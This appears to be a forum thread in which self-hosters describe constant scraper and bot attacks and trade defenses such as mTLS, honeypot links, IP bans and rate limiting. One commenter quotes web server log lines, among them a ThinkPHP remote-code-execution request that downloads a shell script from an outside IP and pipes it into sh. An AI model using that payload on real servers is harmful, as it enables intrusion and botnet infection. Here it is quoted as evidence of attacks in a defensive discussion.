> The internet is no longer a safe haven for software hobbyists
Maybe I've just had bad luck, but since I started hosting my own websites back around 2005 or so, my servers have always been attacked basically from the moment they come online. Even more so when you attach any sort of DNS name to them, and especially when you use TLS, I'm guessing because the certificates end up in a big, easily accessible index (the certificate transparency logs). Once you start sharing your website, it again triggers an avalanche of bad traffic, and the final boss is when you piss off some organization and (I'm assuming) they hire some bad actor to try to knock you offline.
Dealing with crawlers, botnets, automation gone wrong, pissed-off humans and so on has been almost a yearly thing for me since I started deploying stuff to the public internet. But again, maybe I've had bad luck? I've hosted stuff across a wide range of providers, and it seems to happen on all of them.
My stuff used to get popped daily. A janky PHP guestbook I wrote just to learn back in the early 2000s? No HTML injection protection, and someone turned my site into a spammy XSS hack within days. A WordPress installation I fell behind on patching? Turned into SEO spam in hours. A Redis instance I was using just to learn some of their data structures that got accidentally exposed to the web? Used to root my computer and install a botnet RAT. This was all before 2020.
I never felt this made the internet "unsafe". Instead, it just reminded me how I messed up. Every time, I learned how to do better, and I added more guardrails. I haven't gotten popped that obviously in a long time, but that's probably because I've acted to minimize my public surface area, used wildcard certs to avoid showing up in the certificate transparency logs, added basic auth wherever I can, and generally refused to _trust_ software that's exposed to the web. It's not unsafe if you take precautions, have backups, and are careful about what you install.
If you want to see unsafe, look at how someone who doesn't understand tech tries to interact with it. Downloading any random driver or exe to fix a problem, installing apps when a website would do, giving Facebook or TikTok all of their information and access without recognizing that just maybe these multi-billion-dollar companies who give away all of their services don't have your best interests in mind.
Hosting a WordPress site with any number of third-party plugins written by script kiddies, without constant vigilance and keeping things up to date, is a recipe for disaster. This makes it a job guarantee: hapless people paying for someone to set up a hopelessly over-complicated WP setup, paying for lots of plugins, and paying for constant upkeep. Basically, that ecosystem feeds an entire community of "web developers" by pushing badly written software that then endlessly needs to be patched and maintained. Then the feature creep sets in and plugins stray from the path of doing one thing well, until even WP instance maintainers deem them too bloated and look for a simpler one. Then the cycle begins anew.
I really like how you take these situations and turn them into learning moments, but ultimately what you’re describing still sounds like an incredibly hostile space. Like yeah everyone should be a defensive driver on the road, but we still acknowledge that other people need to follow the rules instead of forcing us to be defensive drivers all the time.
My first ever deployed project was breached on day 1, with my database dropped and a ransom note left in its place.
It was a beginner mistake on my part that allowed this, but it's still pretty discouraging. It's not the internet that sucks, it's people that suck.
My Gitea instance also encountered aggressive scraping a few days ago, but with requests highly distributed across IPs, ASNs, and geolocations, each of which stayed well below the rate of a human visitor. I assume Anubis will not stop the massively funded AI companies, so I'm considering poisoning the scrapers with garbage code, only targeting blind scrapers, of course.
Sadly we're now seeing services that sell proxy access that lets you scrape from a wide variety of residential IPs; some even go so far as to label their IPs as "ethically sourced".
Anubis is definitely playing the cat-and-mouse game to some extent, but I like what it does because it forces bots to either identify themselves as such or face challenges.
That said, we can likely do better. Cloudflare does well in part because it handles so much traffic, so it has a lot of data across the internet. Smaller operators just don't get enough traffic to deal with abusive IPs without banning entire ranges indefinitely, which is not ideal. I hope to see a solution like CrowdSec, where reputation data can be crowdsourced to block known bad bots (at least for a while, since they are likely borrowing IPs) while using low-complexity (potentially JS-free) challenges for IPs with no bad reputation. It's probably too much to ask of Anubis upstream, which is likely already busy enough with the challenges of what it does at the scale it operates, but it does leave some room for further innovation for whoever wants to go for it.
In my opinion there is no reason a drop-in solution couldn't mostly resolve these problems and make it easier for hobbyists to run services again.
I do not have a solution for a blog like this, but if you are self-hosting I recommend enabling mTLS on your reverse proxy.
I'm doing this for a dozen services hosted at home. The reverse proxy just drops the request if the user does not present a certificate. My devices which can present a cert connect seamlessly. It's a one-time setup, but once done you can forget about it.
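For anyone curious what that looks like in practice, here is a minimal sketch of the same idea using Python's standard library instead of a reverse proxy; the file names are placeholders, and in a real setup you would use your proxy's own client-certificate options (e.g. nginx's ssl_verify_client) rather than this toy server.

    # Minimal sketch: an HTTPS endpoint that drops any client without a certificate
    # signed by your own CA. File names below are placeholders.
    import http.server
    import ssl

    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.load_cert_chain("server.crt", "server.key")   # the server's own cert/key
    ctx.load_verify_locations("client-ca.pem")        # CA that issued your devices' certs
    ctx.verify_mode = ssl.CERT_REQUIRED               # handshake fails without a valid client cert

    httpd = http.server.HTTPServer(("0.0.0.0", 8443), http.server.SimpleHTTPRequestHandler)
    httpd.socket = ctx.wrap_socket(httpd.socket, server_side=True)
    httpd.serve_forever()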
That's fine if you're hosting stuff just for yourself but not really practical if you're hosting stuff you want others to be able to read, such as a blog.
You can mTLS to CloudFlare too, if you’re not one of the anti-CloudFlare people. Then all traffic drops besides traffic that passes thru CF and the mTLS handshake prevents bypassing CF.
> Fail2ban was struggling to keep up: it ingests the Nginx access.log file to apply its rules but if the files keep on exploding…
> [...]
> But I don’t want to fiddle with even more moving components and configuration
Since I moved my DNS records to Cloudflare (that is: the nameserver is now the one from Cloudflare), I get tons of odd connections, most notably SYN packets to either 443 or 22, which never respond after the SYN-ACK. They ping me about once a second on average, distributing the IPs over a /24 network.
I really don't understand why they do this, and it's mostly from shady origins, like VPS game server hosters from Brazil and so on.
I'm at the point where I capture all the traffic, look for SYN packets, and check their RDAP records to decide whether to drop that organization's entire subnets, whitelisting things like Google.
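If anyone wants to automate that lookup step, here is a rough sketch of the RDAP part in Python. rdap.org is a public bootstrap service that redirects to the responsible regional registry; the exact JSON fields can vary a bit between registries, so treat this as an assumption-laden starting point rather than a finished tool.

    # Rough sketch: ask RDAP who is behind an address before dropping its whole range.
    import json
    import urllib.request

    def rdap_lookup(ip: str) -> dict:
        # rdap.org redirects to the right registry (ARIN, RIPE, APNIC, ...)
        with urllib.request.urlopen(f"https://rdap.org/ip/{ip}", timeout=10) as resp:
            return json.load(resp)

    info = rdap_lookup("203.0.113.7")  # documentation address, just for illustration
    # "name", "startAddress" and "endAddress" are common fields, but not guaranteed everywhere
    print(info.get("name"), info.get("startAddress"), info.get("endAddress"))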
Digital Ocean is notoriously a source of bad traffic, they just don't care at all.
> like vps game server hoster from Brazil and so on.
Probably someone DDoSing a Minecraft server or something.
People in games do this where they DDoS each other. You can get access to a DDoS panel for as little as $5 a month.
Some providers allow spoofing the src IP; that's how they do these reflection attacks. So you're not actually dropping the sender of these packets, but the victims.
These are spoofed packets for SYNACK reflection attacks. Your response traffic goes to the victim, and since network stacks are usually configured to retry SYNACK a few times, they also get amplification out of it
I wonder if you can have a chain of "invisible" links on your site that a normal person wouldn't see or click.
The links can go page A -> page B -> page C, where a request for C = instant IP ban.
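As a sketch of how that chain could look (all paths and thresholds here are invented for illustration), the idea is that only something blindly following every link ever reaches the last hop:

    # Toy sketch: invisible links lead A -> B -> C; anything that reaches C gets banned.
    from http.server import BaseHTTPRequestHandler, HTTPServer

    BANNED = set()  # in practice you would feed these into ipset/nftables instead
    HIDDEN = '<a href="{target}" style="display:none" rel="nofollow"></a>'

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            ip = self.client_address[0]
            if ip in BANNED:
                self.send_error(403)
                return
            if self.path == "/trap/c":
                BANNED.add(ip)        # three hops deep: no human got here by accident
                self.send_error(403)
                return
            self.send_response(200)
            self.send_header("Content-Type", "text/html")
            self.end_headers()
            if self.path == "/trap/a":
                self.wfile.write(HIDDEN.format(target="/trap/b").encode())
            elif self.path == "/trap/b":
                self.wfile.write(HIDDEN.format(target="/trap/c").encode())
            else:
                # every normal page carries an invisible entry point into the trap
                body = "<html><body>normal content" + HIDDEN.format(target="/trap/a") + "</body></html>"
                self.wfile.write(body.encode())

    HTTPServer(("0.0.0.0", 8080), Handler).serve_forever()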
I self-host and I have something like this but more obvious: I wrote a web service that talks to my MikroTik via its API and adds the IP of the requester to the block list with a 30-day timeout (configurable, of course). Its hostname is "bot-ban-me.myexamplesite.com" and it is set up like a normal site in my reverse proxy. So when I request a cert, this hostname is in the cert, and in the first few minutes I can catch lots of bad apples. I do not expect anyone to ever type this. I do not mention the address anywhere, so the only way to land there is to watch the CT logs.
We do something similar for ssh. If a remote connection tries to log in as "root" or "admin" or any number of other usernames that indicate a probe for vulnerable configurations, that's an insta-ban for that IP address (banned not only for SSH but for everything).
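A crude version of that can be done by tailing the auth log and pushing offenders into a firewall set. The log patterns, path, and ipset name below are assumptions and vary by distro, so treat this as a sketch rather than a drop-in tool (fail2ban does the same job with more polish).

    # Sketch: ban IPs that probe ssh with giveaway usernames, for all services at once.
    import re
    import subprocess
    import time

    PROBE_USERS = {"root", "admin", "oracle", "test", "ubuntu"}
    PATTERNS = [
        re.compile(r"Invalid user (\S+) from (\d+\.\d+\.\d+\.\d+)"),
        re.compile(r"Failed password for (root) from (\d+\.\d+\.\d+\.\d+)"),
    ]

    def ban(ip: str) -> None:
        # "banned" is assumed to be an ipset that the firewall drops on every port, not just 22
        subprocess.run(["ipset", "add", "banned", ip, "-exist"], check=False)

    with open("/var/log/auth.log") as log:
        log.seek(0, 2)                 # start at the end, like tail -f
        while True:
            line = log.readline()
            if not line:
                time.sleep(1)
                continue
            for pattern in PATTERNS:
                m = pattern.search(line)
                if m and m.group(1) in PROBE_USERS:
                    ban(m.group(2))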
Scrapers nowadays can use residential and mobile IPs, so banning by IP, even if actual malicious requests are coming from them, can also prevent actual unrelated people from accessing your service.
Unless you're running a very popular service, unlikely that a random residential IP would be both compromised by a malicious VPN and also trying to access your site legitimately.
I very much relate to the author's sour mood and frustration. I also host a small hobby forum and have experienced the same attacks constantly, and it has gotten especially bad the last couple of years with the rise of AI.
In the early days I put Google Analytics on the site so I could observe traffic trends. Then, we were all forced to start adding certificates to our sites to keep them "safe".
While I think we're all doomed to continue that annual practice or get blocked by browsers, I have often considered removing Google Analytics. Ever since their redesign it is essentially unusable for me now. What benefit does it bring if I can't understand the product anymore?
Last year, in a fit of desperation, I added Cloudflare. This has a brute-force "under attack" mode that seems to stop all bots from accessing the site. It puts up a silly "hang on a second, are you human" page before the site loads, but it does seem to work. Is it great UX? No, but at least the site isn't getting hammered from various locations in Asia. Cloudflare also lets me block entire countries, although that seems to be easily fooled.
I also don't think a lot of the bots/AI crawlers honor the rules set in the robots.txt. It's all an honor system anyway, and they are completely lacking in it.
There need to be some hard and fast rules put in place, somehow, to stop the madness.
> Other things I’ve noticed is increased traffic with Referer headers coming from strange websites such as bioware.com, mcdonalds.com, and microsoft.com
I've been seeing this too, I guess scrapers think they can get through some blockers with a referrer?
I wonder why it is that we've seen an increase in these automated scrapers and attacks of late (the past few years); is there better (open-source?) technology that allows it? Is it because hosting infrastructure is cheaper for the attackers too? Both? Something else?
Maybe the long-term solution for such attacks is to hide most of the internet behind some kind of Proof of Work system/network, so that mostly humans get to access our websites, not machines.
What's missing is effective international law enforcement. This is a legal problem first and foremost. As long as it's as easy as it is to get away with this stuff by just routing the traffic through a Russian or Singaporean node, it's going to keep happening. With international diplomacy going the way it has been, odds of that changing aren't fantastic.
The web is really stuck between a rock and a hard place when it comes to this. Proof of work helps website owners, but makes life harder for all discovery tools and search engines.
An independent standard for request signing and building some sort of reputation database for verified crawlers could be part of a solution, though that causes problems with websites feeding crawlers different content than users, and does nothing to fix the Sybil attack problem.
This is already kind of true with every global website, the idea of a single global internet is one of those fairy tale fantasy things, that maybe happened for a little bit before enough people used it. In many cases it isn't really ideal today.
Good points; I would definitely vouch for an independent standard for request signing plus some kind of decentralized reputation system. With international law enforcement, I think there could be too many political issues for it not to become corrupt.
I don’t think this can be solved legally without compromising anonymity. You can block unrecognized clients and punish the owners of clients that behave badly, but then, for example, an oppressive government can (physically) take over a subversive website and punish everyone who accesses it.
Maybe pseudo-anonymity and “punishment” via reputation could work. Then an oppressive government with access to a subversive website (ignoring bad security, coordination with other hijacked sites, etc.) can only poison its clients’ reputations, and (if reputation is tied to sites, who have their own reputations) only temporarily.
> but then, for example, an oppressive government can (physically) take over a subversive website and punish everyone who accesses it.
Already happens. Oppressive governments already punish people for visiting "wrong" websites. They already censor the internet.
There are no technological solutions to coordination problems. Ultimately, no matter what you invent, it's politics that will decide how it's used and by whom.
It's not necessarily going through a Russian or Singaporean node though, on the sites I'm responsible for, AWS, GCP, Azure are in the top 5 for attackers. It's just that they don't care _at all_ about that happening.
I don't think you need world-wide law-enforcement, it'll be a big step ahead if you make owners & operators liable. You can limit exposure so nobody gets absolutely ruined, but anyone running wordpress 4.2 and getting their VPS abused for attacks currently has 0 incentive to change anything unless their website goes down. Give them a penalty of a few hundred dollars and suddenly they do. To keep things simple, collect from the hosters, they can then charge their customers, and suddenly they'll be interested in it as well, because they don't want to deal with that.
The criminals are not held liable, and neither are their enablers. There's very little chance anything will change that way.
The big cloud providers need to step up and take responsibility. I understand that it can't be too easy to do, but we really do need a way to contact e.g. AWS and tell them to shut off a customer. I have no problem with someone scraping our websites, but I do mind when they don't do it responsibly: slow down when we start responding more slowly, and don't assume that you can just go full throttle, crash our site, wait, and then do it again once we start responding again.
You're absolutely right: AWS, GCP, Azure and others, they do not care and especially AWS and GCP are massive enablers.
I'm pretty sure it is the commercial demand for data from AI companies. It is certainly the popular conception among sysadmins that it is AI companies who are responsible for the wave of scrapers over the past few years, and I see no compelling alternative.
Another potential cause: it's way easier for pretty much any person connected to the internet to "create" their own automation software by using LLMs. I'd wager even the less smart LLMs could handle "Create a program that checks this website every second for any product updates on all pages" and give enough instructions for the average computer user to be able to run it without thinking or considering much.
Multiply this by every person with access to an LLM who wants to "do X with website Y" and you'll get an order-of-magnitude increase in traffic across the internet. This has been possible since, what, sometime in 2023? Not sure if the patterns would line up, but it's just another guess at the cause(s).
Attached to IP address is easiest to grok, but wouldn't work well since addresses lack affinity. OK, so we introduce an identifier that's persistent, and maybe a user can even port it between devices. Now it's bad for privacy. How about a way a client could prove their reputation is above some threshold without leaking any identifying information? And a decentralized way for the rest of the internet to influence their reputation (like when my server feels you're hammering it)?
Do anti-DDoS intermediaries like Cloudflare basically catalog a spectrum of reputation at the ASN level (pushing anti-abuse onus to ISP's)?
This is basically what happened to email/SMTP, for better or worse :-S.
20+ years ago there were mail blacklists that basically blocked residential IP blocks, as there should not be servers trying to send normal mail from there. Now you must try the opposite: blacklist blocks where only servers and not end users can come from, as there are potentially badly behaved scrapers in all major clouds and server hosting platforms.
But then there are residential proxies that pay end users to route requests from misbehaved companies, so that door is also a bad mitigation
It's interesting that along another axis, the inertia of the internet moved from a decentralized structure back toward something that resembles mainframes. I don't think those axes are orthogonal.
Reputation plus privacy is probably unsolvable; the whole point of reputation is knowing what people are doing elsewhere. You don’t need reputation, you need persistence. You don’t need to know if they are behaving themselves elsewhere on the Internet as long as you can ban them once and not have them come back.
Services need the ability to obtain an identifier that:
- Belongs to exactly one real person.
- That a person cannot own more than one of.
- That is unique per-service.
- That cannot be tied to a real-world identity.
- That can be used by the person to optionally disclose attributes like whether they are an adult or not.
Services generally don’t care about knowing your exact identity but being able to ban a person and not have them simply register a new account, and being able to stop people from registering thousands of accounts would go a long way towards wiping out inauthentic and abusive behaviour.
The ability to “reset” your identity is the underlying hole that enables a vast amount of abuse. It’s possible to have persistent, pseudonymous access to the Internet without disclosing real-world identity. Being able to permanently ban abusers from a service would have a hugely positive effect on the Internet.
A digital "Death penalty" is not a win for society, without considering a fair way to atone for "crimes against your digital identity".
It would be way too easy for the current regime (whomever that happens to be) to criminalize random behaviors (Trans people? Atheists? A random nationality?) to ban their identity, and then they can't apply for jobs, get bus fare, purchase anything online, communicate with their lawyers, etc.
Describing “I don’t want to provide service to you and I should have the means of doing so” as a “digital death penalty” is a tad hyperbolic, don’t you think?
> It would be way too easy for the current regime (whomever that happens to be) to criminalize random behaviors (Trans people? Atheists? A random nationality?) to ban their identity, and then they can't apply for jobs, get bus fare, purchase anything online, communicate with their lawyers, etc.
Authoritarian regimes can already do that.
I think perhaps you might’ve missed the fact that what I was suggesting was individual to each service:
> Reputation plus privacy is probably unsolvable; the whole point of reputation is knowing what people are doing elsewhere. You don’t need reputation, you need persistence. You don’t need to know if they are behaving themselves elsewhere on the Internet as long as you can ban them once and not have them come back.
I was saying don’t care about what people are doing elsewhere on the Internet. Just ban locally – but persistently.
If creating an identity has a cost, then why not allow people to own multiple identities? Might help on the privacy front and address the permadeath issue.
Of course everything sounds plausible when speaking at such a high level.
I agree and think the ability to spin up new identities is crucial to any sort of successful reputation system (and reflects the realities of how both good and bad actors would use it). Think back to early internet when you wanted an identity in one community (e.g. forums about games you play) that was separate from another (e.g. banking). But it means those reputation identities need to take some investment (e.g. of time / contribution / whatever) to build, and can't become usefully trusted until reaching some threshold.
Because of course what this world needs is for the wealthy to have even more advantages over the normies. (Hint: If you're reading this, and think you're one of the wealthy ones, you aren't)
I guess it is just because 1) they can, and 2) everyone wants some data. I think it would be interesting if every website out there started to push out BS pages just for scrapers. Not sure how much extra cost it would take if a website put up, say, 50% BS pages that only scrapers can reach, or BS material in extremely small fonts hidden in regular pages that ordinary people cannot see.
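The marginal cost can be close to zero if the garbage is generated deterministically from the URL instead of being stored. A toy sketch of that idea (the word list and paths are invented for illustration):

    # Toy sketch: cheap, deterministic filler pages that only suspected scrapers get served.
    import hashlib
    import random

    WORDS = ["widget", "analysis", "protocol", "quarterly", "update", "legacy", "notes", "draft"]

    def garbage_page(path: str, paragraphs: int = 20) -> str:
        # Seed from the URL: the same path always yields the same page, nothing is stored.
        rng = random.Random(hashlib.sha256(path.encode()).digest())
        body = "".join(
            "<p>" + " ".join(rng.choice(WORDS) for _ in range(60)) + "</p>"
            for _ in range(paragraphs)
        )
        # Each garbage page links to more garbage, so a blind crawler keeps digging.
        links = "".join(f'<a href="/notes/{rng.randrange(10**6)}">more</a> ' for _ in range(10))
        return "<html><body>" + body + links + "</body></html>"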
Why? It’s because of AI. It enables attacks at scale. It enables more people to attack, who previously couldn’t. And so on.
It’s very explainable. And somehow, like clockwork, there are always comments to say “there is nothing new, the Internet has always been like this since the 80s”.
You know, part of me wants to see AI proliferate into more and more areas, just so these people will finally wake up eventually and understand there is a huge difference when AI does it. When they are relentlessly bombarded with realistic phone calls from random numbers, with friends and family members calling about the latest hoax and deepfake, when their own specific reputation is constantly attacked and destroyed by 1000 cuts not just online but in their own trusted circles, and they have to put out fires and play whack-a-mole with an advanced persistent threat that only grows larger and always comes from new sources, anonymous and not.
And this is all before bot swarms that can coordinate and plan long-term, targeting specific communities and individuals.
And this is all before humanoid robots and drones proliferate.
Just try to fast-forward to when human communities online and offline are constantly infiltrated by bots and drones and sleeper agents, playing nice for a long time and amassing karma / reputation / connections / trust / whatever until finally doing a coordinated attack.
Honestly, people just don’t seem to get it until it’s too late. Same with ecosystem destruction — tons of people keep strawmanning it as mere temperature shifts, even while ecosystems around the world get destroyed. Kelp forests. Rainforests. Coral reefs. Fish. Insects. And they’re like “haha global warming by 3 degrees big deal. Temperature has always changed on the planet.” (Sound familiar?)
Look, I don’t actually want any of this to happen. But if they could somehow experience the movie It’s a Wonderful Life or meet the Ghost of Christmas Yet to Come, I’d wholeheartedly want every denier to have that experience. (In fact, a dedicated attacker can already give them a taste of this with current technology. I am sure it will become a decentralized service soon :-( )
Our tech overlords understand AI, especially any form of AGI, will basically be the end of humanity. That’s why they’re entirely focused on being the first and amassing as much wealth in the meanwhile, giving up on any sort of consideration whether they’re doing good for people or not.
Unpopular opinion: the real source of the problem is not scrapers, but your unoptimized web software. Gitea and Fail2ban are resource hogs in your case, either unoptimized or poorly configured.
My tiny personal web servers can withstand thousands of requests per second, barely breaking a sweat. As a result, none of the bots or scrapers are causing any issue.
"The only thing that had immediate effect was sudo iptables -I INPUT -s 47.79.0.0/16 -j DROP" Well, by blocking an entire /16 range, it is this type of overzealous action that contributes to making the internet experience a bit more mediocre. This is the same thinking that lead me to, for example, not being able to browse homedepot.com from Europe. I am long-term traveling in Europe and like to frequent DIY websites with people posting links to homedepot, but no someone at HD decided that European IPs couldn't access their site, so I and millions of others are locked out. The /16 is an Alibaba AS, and you make the assumption that most of it is malicious, but in reality you don't know. Fix your software, don't blindly block.
sad but hosting static content like his site in a cloud would save him headache. i know i know must "do it yourself" but if that is his path he knows the price. maybe i am wrong and do not understand the problem but it seems like asking for a headache.
I think the author would agree, and that is in fact the point of his post.
The only way to solve these problems is using some large hosted platform where they have the resources to constantly be managing these issues. This would solve their problem.
But isn't it sad that we can't host our own websites anymore, like many of us used to? It was never easy, but it's nearly impossible now and this is only one reason.
i think it has been a hard to host a site since about 2007. i stopped then because it is too much work to keep it safe. even worse now but it has always been extra work since search engines. maybe the OP is just getting older and wants to spend time with his kids and not play with nginx haha.
I run a dedicated firewall/dns box with netfilter rules to rate limit new connections per IP. It looks like I may need to change that to rate limit per /16 subnet...
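A sketch of the counting side of that in Python (the limit is arbitrary); the actual dropping would still be done by netfilter, for example via an ipset of /16 networks, or with iptables' hashlimit module, which I believe can aggregate by source mask.

    # Sketch: count new connections per /16 instead of per single IP.
    import ipaddress
    from collections import Counter

    def bucket(ip: str) -> str:
        # Collapse an IPv4 source address to its /16, so a crawler spread
        # across one provider's range still trips the limit.
        return str(ipaddress.ip_network(f"{ip}/16", strict=False))

    def offending_nets(recent_ips, limit=100):
        counts = Counter(bucket(ip) for ip in recent_ips)
        return [net for net, seen in counts.items() if seen > limit]

    # Feed it the source IPs seen in the last minute, then drop the returned /16s.
    print(offending_nets(["198.51.100.7", "198.51.100.8", "203.0.113.5"], limit=1))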
The Internet has really been an interesting case study for what happens between people when you remove a varying number of layers of social control.
All the way back to the early days of Usenet really.
I would hate to see it but at the same time I feel like the incentives created by the bad actors really push this towards a much more centralized model over time, e.g. one where all traffic provenance must be signed and identified and must flow through a few big networks that enforce laws around that.
"Socialists"* argue for more regulations; "liberals" claim that there should be financial incentives to not do that.
I'm neither. I believe that we should go back to being "tribes"/communities. At least it's a time-tested way to – maybe not prevent, but somewhat alleviate – the tragedy of the commons.
(I'm aware that this is a very poor and naive theory; I'll happily ditch it for a better idea.)
The problem with anything, anything, without a centralized authority, is that friction overwhelms inertia. Bad actors exist and have no mercy, while good people downplay them until it’s too late. Entropy always wins. Misguided people assume the problem is powerful people, when the problem is actually what the powerful people use their authority to do, as powerful people will always exist. Accepting that and maintaining oversight is the historically successful norm; abolishing them has always failed.
As such, I don’t identify with the author of this post, about trying to resist CloudFlare for moral reasons. A decentralized system where everyone plays nice and mostly cooperates, does not exist any more than a country without a government where everyone plays nice and mostly cooperates. It’s wishful thinking. We already tried this with Email, and we’re back to gatekeepers. Pretending the web will be different is ahistorical.
The internet has made the world small and that's a problem. Nation states typically had a limited range for broadcasting their authority in the more distant past. A bad ruler couldn't rule the entire world, nor could they cause trouble for the entire world. From nukes to the interconnected web, the worst of us with power can affect everyone else.
Power is a spectrum. Power differentials will always exist but we can absolutely strive to make them smaller and smaller.
1) Most of the civilized world no longer has hereditary dictators (such as "kings"). Because they were removed from power by the people and the power was distributed among many individuals. It works because malicious (anti-social) individuals have trouble working together. And yes, oversight helps.
But it's a spectrum and we absolutely can and should move the needle towards more oversight and more power distribution.
2) Corporate power structures are still authoritarian. We can change that too.
The Internet was a scene, and like all scenes it's done now that the corpos have moved in and taken over (because at that point it's just ads and rent extraction in perpetuity). I dunno what/where/when the next tech scene will be, but I do know it's not going to come from Big Tech. See: Metaverse.
The magical times in the past have always been marked with being able to be part of an "exclusive club" that takes something from nothing to changing the world.
Because of the internet, magical times can never be had again. You can invent something new, but as soon as anyone finds out about it, everyone now finds out about it. The "exclusive club" period is no more.
Yes, they can. But we need to admit to ourselves that people are not equal. Not just in terms of skill but in terms of morality and quality of character. And that some people are best kept out.
Corporations, being amoral, should also be kept out.
---
The old internet was the way it was because of gate keeping - the people on it were selected through technical skill being required. Generally people who are builder types are more pro-social than redistributor types.
Any time I've been in a community which felt good, it was full of people who enjoyed building stuff.
Any time such a community died, it was because people who crave power and status took it over.
There is no something new. Anything we invent will be able to be taken over by complex bots. Welcome to the futureshock where humans aren't at the top of their domain.
Gopher still requires the Internet. I know it's pretty common to conflate "the Internet" with "the World Wide Web", but there are actually other protocols out there (like Gopher).
The internet hasn't been a safe haven since the 80s, or maybe earlier (that was before my time, and it's never been one since I got online in the early 90s).
The only real solution is to implement some sort of identity management system, but that has so many issues that make it a non-starter.
The governments like it that way. They want banks and tech companies to be intermediaries that are more difficult to hold accountable, because they can just say “we didn’t feel like doing business with this person”.
What do you mean by that? Web pages is the central mechanism, we use to put information on the web. Of course many websites are shitty and could be much simpler to convey their information, without looking crap at all. But the web page in general? Why would we ever get rid of something so useful? And what do you suggest as an alternative?
The common man never had a need for the internet or global connectedness. DARPA wanted to push technology to gain the upper hand in world matters. Universities pushed technology to show progress and sell research. Businesses pushed technologies to have more sales. It was a kind of acid rain that was caused by the establishments and sold as scented rain.
This sentiment - along the lines of "the world became too dependent on the Internet", "Internet wasn't a good thing to begin with", "Internet is a threat to national security" etc - has been popping up on HN too often lately, emerged too abruptly and correlates with the recent initiatives to crack down on the Internet too well.
If this is your own opinion and not a part of a psyop to condition people into embracing the death of the Internet as we know it, do you have any solution to propose?
You don't need to have a solution to explore a problem in my opinion. OP comment is problematic but for reasons other than not having a proposed solution.
> Common man never had a need for internet or global connectedness
That's not how culture evolves. You don't necessarily need to have a problem so that a solution is developed. You can very well have a technology developed for other purposes, or just for exploration sake, and then as this tech exists uses for it start to pop post hoc.
You therefore ignore the immense benefit of the access to information that this technology brings. It wasn't necessarily a problem for the common man, but once it's there and access to information is popularized, people adapt and grow dependent on it. Just like electricity.
People with dialup telephones never asked for a smartphone connected to internet. They were just as happy back then or even more happy because phone didn't eat off their time or cause posture problems.
Sure, shopping was slower without the Amazon website, but it was not a less happy experience back then. In fact, homes had less junk and people saved more money.
Messaging? Sure, it makes you spend time in 100 WhatsApp groups, where 99% of the people don't know you personally.
It helped companies to sell more of the junk more quickly.
It created bloggers and content creators who lived in an imaginary world thinking that someone really consumes their content.
It created karma beggars who begged globally for likes that are worth nothing.
It created more concentration of wealth at some weird internet companies, which don't solve any of the world problems or basic needs of the people.
And finally it created AI that pumps plastic sewage to fill the internet. There it is, your immensely useful internet.
As if the plastic pollution was not enough in the real world, the internet will be filled with plastic content.
What else did internet give that is immensely helpful?
I have a very similar experience. In my Nginx logs, I see things like this on a regular basis:
79.124.40.174 - - [16/Nov/2025:17:04:52 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 404 555 "http://142.93.104.181:80/?XDEBUG_SESSION_START=phpstorm" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" ...
145.220.0.84 - - [16/Nov/2025:15:00:21 +0000] "\x16\x03\x01\x00\xCE\x01\x00\x00\xCA\x03\x03\xF7:\xB4]D\x0C\xD0?\xEF~\xAC\xF8\x8C\x80us\xB8=\x0F\x9C\xA8\xC1\xDD\xC4\xDF2\x8CQC\x18\xDC\x1D \xD0{\xC9\x01\xEC\x227\xCB9\xBE\x8C\xE0\xB2\x9F\xCF\x97\xF6\xBE\x88z/\xD7;\xB1\x8C\xEEu\x00\xBF]<\x92\x00" 400 157 "-" "-" "-"
145.220.0.84 - - [16/Nov/2025:15:00:21 +0000] "\x16\x03\x01\x00\xCE\x01\x00\x00\xCA\x03\x03\x8A\xB5\xA4)n\x10\x8CO(\x99u\xD8\x13\x0B\xB7h7\x16\xC5[\x85<\xD3\xDC\x9C\xAB\x89\xE0\x0B\x08a\xDE \x9F2Z\xCD\xD1=\x9B\xBAU1\xF3h\xC1\xEEY<\xAEuZ~2\x81Cg\xFD\x87\x84\xA3\xBA:$\xC8\x00" 400 157 "-" "-" "-"
or:
"192.159.99.95 - - [16/Nov/2025:13:44:03 +0000] "GET /public/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=%28wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.txg.sh%7C%7Cbusybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.txg.sh%7C%7Ccurl%20-s%20http%3A%2F%2F74.194.191.52%2Frondo.txg.sh%29%7Csh HTTP/1.1" 301 169 "-" "Mozilla/5.0 (bang2013@atomicmail.io)" "-"
These are just some examples, but they happen pretty much daily :(
I remember watching the code red signatures in my space logs on my desktop back in 2001
> my servers have always been attacked
I believe the correct verb is monetised.
Well I guess at least on day 1 you didn’t have much to lose!
It's a personal blog, so even if the data was lost it would've been just posts that nobody reads. Certainly not worth the 0.00054 BTC they wanted.
Scrapers have constantly been running against my cgit server for the past year, but they're bizarrely polite in my case... 2-3 requests per minute.
This whole enterprise is clearly run by exceptionally dumb people, since you can just clone all the code I host there directly from upstreams...
I have been using zip bombs and they were effective to some extent. Then I had the smart idea to write about it on HN [0]. The result was a flood of new types of bots that overwhelmed my $6 server. For ~100k daily requests, it wasn't sustainable to serve 1 to 10MB payloads.
I've updated my heuristic to only serve the worst offenders, and created honeypots to collect IPs and respond with 403s. After a few months, and some other spam tricks I'll keep to myself this time, my traffic is back to something reasonable again.
[0]: https://news.ycombinator.com/item?id=43826798
There's likely a large market for this kind of thing. Maybe time to spin out a side business and deploy your heuristics to struggling IPs.
Though I have to admit I don't know who your target audience would be. Self-hosting orgs don't tend to be flush with cash.
Everything good enough to become popular gets swarmed by the teeming masses and then exploited and destroyed.
The only solution seems to be to constantly abandon those things and move on to new frontiers to enjoy until the cycle repeats.
How can a scraper get a mobile IP address?
There was an article just yesterday which detailed doing this not in order to ban but in order to waste time. You can also zip bomb people, which is entertaining but probably not super effective.
https://herman.bearblog.dev/messing-with-bots/
https://news.ycombinator.com/item?id=45935729
I do something like this. Every page gets an invisible link to a honeypot. Click the link, 48hr ban.
Honestly I have no idea how well it works, my logs are still full of bots. *Slow* bots, though. As long as they’re not ddosing me I guess it’s fine?
IP addresses from scrapers are innumerable and in constant rotation.
